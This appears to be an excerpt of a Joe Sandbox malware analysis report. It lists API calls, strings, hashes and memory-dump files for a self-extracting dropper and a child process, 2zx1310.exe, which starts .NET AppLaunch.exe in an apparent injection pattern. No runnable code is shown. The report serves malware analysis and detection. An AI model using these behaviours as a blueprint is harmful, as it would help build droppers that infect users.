Opcode Fuzzy Hash: 11dfa9d3d27f0acafb8d26f6eaabb9b7356a3f96fdfd9f22c1b2cf39689ee6c7
Instruction Fuzzy Hash: 5D0152326011186BD7209B66AC09EDFBBBDDB55750F040166FA49E3290DA748E4A8AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00ED3723
MessageBeep.USER32(00000000), ref: 00ED39C3
MessageBoxA.USER32(00000000,00000000,smo,00000030), ref: 00ED39F1

Strings

3, xrefs: 00ED3785
smo, xrefs: 00ED39E9, 00ED3A19

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$smo
API String ID: 2519184315-1411035656
Opcode ID: 42b203a175c3d6d7e97caf70f49c918c225f22426c312591d85b4c98f933e28f
Instruction ID: 11402781831ed3cf1c090c57bb1f8c0a1592bb98dc3894453cac2ac140ec6bee
Opcode Fuzzy Hash: 42b203a175c3d6d7e97caf70f49c918c225f22426c312591d85b4c98f933e28f
Instruction Fuzzy Hash: 3C91D4B1B022249FDB748A35CD517EA77B1EB85308F1520ABD849BB395D7708F86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00ED0000,000007D6,00000005), ref: 00ED652A
LoadResource.KERNEL32(00ED0000,00000000,?,?,00ED2EE8,00000000,00ED19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00ED6538
DialogBoxIndirectParamA.USER32(00ED0000,00000000,00000547,00ED19E0,00000000), ref: 00ED6557
FreeResource.KERNEL32(00000000,?,?,00ED2EE8,00000000,00ED19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00ED6560

Strings

., xrefs: 00ED657C

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .
API String ID: 1214682469-1603360339
Opcode ID: d0471206db9e84950688e640588df5b4fda88fc3617875d35028a0fd39b07236
Instruction ID: 0f41a5834f8b6c0559a1cfd001e136d705533ef936f64bbfef1e6a72d4157a28
Opcode Fuzzy Hash: d0471206db9e84950688e640588df5b4fda88fc3617875d35028a0fd39b07236
Instruction Fuzzy Hash: B4012672101205BFCB105FAABC08DBB7B6CEB85364F040527FE10B3290D7719E5186A1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00ED64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00ED64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00ED6502

Strings

advpack.dll, xrefs: 00ED64C2, 00ED64CD, 00ED6501
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED64AC

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
API String ID: 438848745-3736221019
Opcode ID: 20895a0bf87b58cab51a57b4e5c839fa61df3ad47ed3ed5c68153f66b60ef1b4
Instruction ID: da9c3ab47bb5351dac16759169b0806ebfb2943b5b674dd54dab8ec7002d0e81
Opcode Fuzzy Hash: 20895a0bf87b58cab51a57b4e5c839fa61df3ad47ed3ed5c68153f66b60ef1b4
Instruction Fuzzy Hash: CA01D170A01108AFDB10DB65EC49EEE7378EB90310F5015A7F585B22D0DF709ECB8A51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00ED30B4), ref: 00ED4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00ED30B4), ref: 00ED41E7

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Strings

<None>, xrefs: 00ED41C5
FINISHMSG, xrefs: 00ED4173, 00ED41AB

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: fc1df83d074fbc96d16e82e5ad6b918277cba71788d08476e598ef90f23ce8dc
Instruction ID: 7ba4354760607f000897d932a6c256a852ccf7ca9d00651f69344eb7c70fc414
Opcode Fuzzy Hash: fc1df83d074fbc96d16e82e5ad6b918277cba71788d08476e598ef90f23ce8dc
Instruction Fuzzy Hash: 4701ADE13022243FE3242A669C86F7B628EDBE4799F05603BB706F13C09A79CD434175

Uniqueness

Uniqueness Score: -1.00%

Function 00ED19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00ED1A18
GetDesktopWindow.USER32 ref: 00ED1A24
LoadStringA.USER32(?,?,00000200), ref: 00ED1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00ED1A62
MessageBeep.USER32(000000FF), ref: 00ED1A6A

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 93d800fed4432926724dc83d42b1b7a4327fa0f4fb296f90e70e531d87eeb66c
Instruction ID: a110858a02a27fd6a7e587b1364f452ce026c9236f53ec9d4970c2d9380039b6
Opcode Fuzzy Hash: 93d800fed4432926724dc83d42b1b7a4327fa0f4fb296f90e70e531d87eeb66c
Instruction Fuzzy Hash: 9111A571502119AFDB10EF64EE08AAE77B8EF49300F1051A6F512B2291DA309F06CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00ED7182
GetCurrentProcessId.KERNEL32 ref: 00ED7191
GetCurrentThreadId.KERNEL32 ref: 00ED719A
GetTickCount.KERNEL32 ref: 00ED71A3
QueryPerformanceCounter.KERNEL32(?), ref: 00ED71B8

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: f8b5ad49a0c9632619235e20fba13df211871fae1ab5793e80754e0a3acb5b16
Instruction ID: 544356c1bc6e1adcd01c6d518648150a588302391249a3fce0d2ea7330b7689a
Opcode Fuzzy Hash: f8b5ad49a0c9632619235e20fba13df211871fae1ab5793e80754e0a3acb5b16
Instruction Fuzzy Hash: 2B110A71D06208DFCB10DFB9EA48A9EB7F5EF48315F655967D805F7210EA309B098B41

Uniqueness

Uniqueness Score: -1.00%

Function 00ED63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00ED642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00ED645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00ED647A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED63EB

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 1065093856-1610346413
Opcode ID: 9710d256280adda956c5e06d45e962b3d24560561fbcb0019c785725cf240831
Instruction ID: 871d4db0ed8a540d3202d59dc3c21b39d848161261990f5266743aa3ed54ec01
Opcode Fuzzy Hash: 9710d256280adda956c5e06d45e962b3d24560561fbcb0019c785725cf240831
Instruction Fuzzy Hash: 9021D571A01218AFD710DF25EC85FEB73B8EB45314F0041ABF595B7280DAB05E898FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00ED47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00ED4E6F), ref: 00ED47EA
LocalAlloc.KERNEL32(00000040,?), ref: 00ED4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00ED4847

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED4851

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 359063898-1610346413
Opcode ID: a4c67f1f11f0694816e4476617803037781f745c821236d7b56a26e158d1968c
Instruction ID: d854c05bb2adfa2f65dd08db3f8cfb75cbc222990bc8c6783e11b5cb8a3c27c1
Opcode Fuzzy Hash: a4c67f1f11f0694816e4476617803037781f745c821236d7b56a26e158d1968c
Instruction Fuzzy Hash: 1011E3F96056426FD7199F24BC18F763BAAEB95340B04951BF942BB381DA358C0B8660

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00ED369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED36B2
DispatchMessageA.USER32(?), ref: 00ED36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED36DA

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 8e9ba6e7441f1b254acd19a33547bed0383afcbceb3adffc399b7427befc7d7a
Instruction ID: d13d8288895036a655430c3f44487c2c461ef54b9cbc981af85606c7bec9f200
Opcode Fuzzy Hash: 8e9ba6e7441f1b254acd19a33547bed0383afcbceb3adffc399b7427befc7d7a
Instruction Fuzzy Hash: 270144729012557BDB308AA76C48EEB7B7CEB86B15F14012BB925F2280D561C645C672

Uniqueness

Uniqueness Score: -1.00%

Function 00ED65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00ED2B33), ref: 00ED6602
CharPrevA.USER32(?,00000000), ref: 00ED6612
CharPrevA.USER32(?,00000000), ref: 00ED6629
CharNextA.USER32(00000000), ref: 00ED6635

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 021f65828560e16a69becb3954601616039419bcfc0ac6dac9dddadb34474d46
Instruction ID: 8ed8ef4e4e0e33526a3209eeccd23abb68cd268e62792a9995e59f19549daafe
Opcode Fuzzy Hash: 021f65828560e16a69becb3954601616039419bcfc0ac6dac9dddadb34474d46
Instruction Fuzzy Hash: EFF02D710061506ED7321F29DC888BBBF9CCF87358B1D01BFE4A1B2211D6154E4B8661

Uniqueness

Uniqueness Score: -1.00%

Function 00ED69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00ED6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00ED6FC5

__set_app_type.MSVCRT ref: 00ED69C2
__p__fmode.MSVCRT ref: 00ED69D8
__p__commode.MSVCRT ref: 00ED69E6
__setusermatherr.MSVCRT ref: 00ED6A07

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: a20eaf9edbf89ac82f35003e616750db4f6a8ebf15bf035cb50cd68469e4c50c
Instruction ID: 77680fbd02330176cd74a09d3a650535f61ce7ba0daf36a34a19978cdc1804a8
Opcode Fuzzy Hash: a20eaf9edbf89ac82f35003e616750db4f6a8ebf15bf035cb50cd68469e4c50c
Instruction Fuzzy Hash: F6F0F87410A3018FD718AB37BE0A6083BA2FB04321B54561BE4A1B63F0DF3A864A8A11

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00ED5760,?,A:\), ref: 00ED697F
MulDiv.KERNEL32(?,?,00000400), ref: 00ED6999

Strings

`W, xrefs: 00ED6972, 00ED6975

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W
API String ID: 1705453755-2113494416
Opcode ID: ed2d061cf2f26a164ea9216b2e673af02e80ae848292450d25e2aa1f858a4e35
Instruction ID: a9489b4bf329ef2daa4c9a52f04657d492418e063ea3917e194d147d196e1983
Opcode Fuzzy Hash: ed2d061cf2f26a164ea9216b2e673af02e80ae848292450d25e2aa1f858a4e35
Instruction Fuzzy Hash: CBF097B6D11228BBDB11DFE99944ADEBBBCEB48700F144197A510F6240D6719A058B91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 2zx1310.exePID: 3140, Parent PID: 6588COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.6%
Total number of Nodes:	140
Total number of Limit Nodes:	13

Executed Functions

Function 0085F020 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 283
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 0085F151

Strings

ridding, xrefs: 0085F2F7
D, xrefs: 0085F0EF
D, xrefs: 0085F0AD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 0085F100
'&e{, xrefs: 0085F179

Memory Dump Source

Source File: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: '&e{$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe$D$D$ridding
API String ID: 963392458-4294493744
Opcode ID: 2ae5a70debc97654970261fa7b2486f9e2b7512c197dcfa3a8e73fcca41ae2e6
Instruction ID: 78ca4c01c759f92eb46fc0ce41225c757411cade018105b9754acc19bf19198e
Opcode Fuzzy Hash: 2ae5a70debc97654970261fa7b2486f9e2b7512c197dcfa3a8e73fcca41ae2e6
Instruction Fuzzy Hash: E1E1DFB4904218CFDB14DF68D98479DBBF0FF48318F1085A9E889AB342D7759989CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00904835 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7d665fec3a9ba433d6926a81cb9e1e29518287ad36143f0737bc5571fe5ab2
Instruction ID: 5580f00485023125a2c3d6310b87bfe70913fcf47c84f7a6d6299139fafec2db
Opcode Fuzzy Hash: 5c7d665fec3a9ba433d6926a81cb9e1e29518287ad36143f0737bc5571fe5ab2
Instruction Fuzzy Hash: 9FE04672911268EBCB14DB988904A8AB3ACEB85B04B11449ABA01D3151C270DE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 008CD14E Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

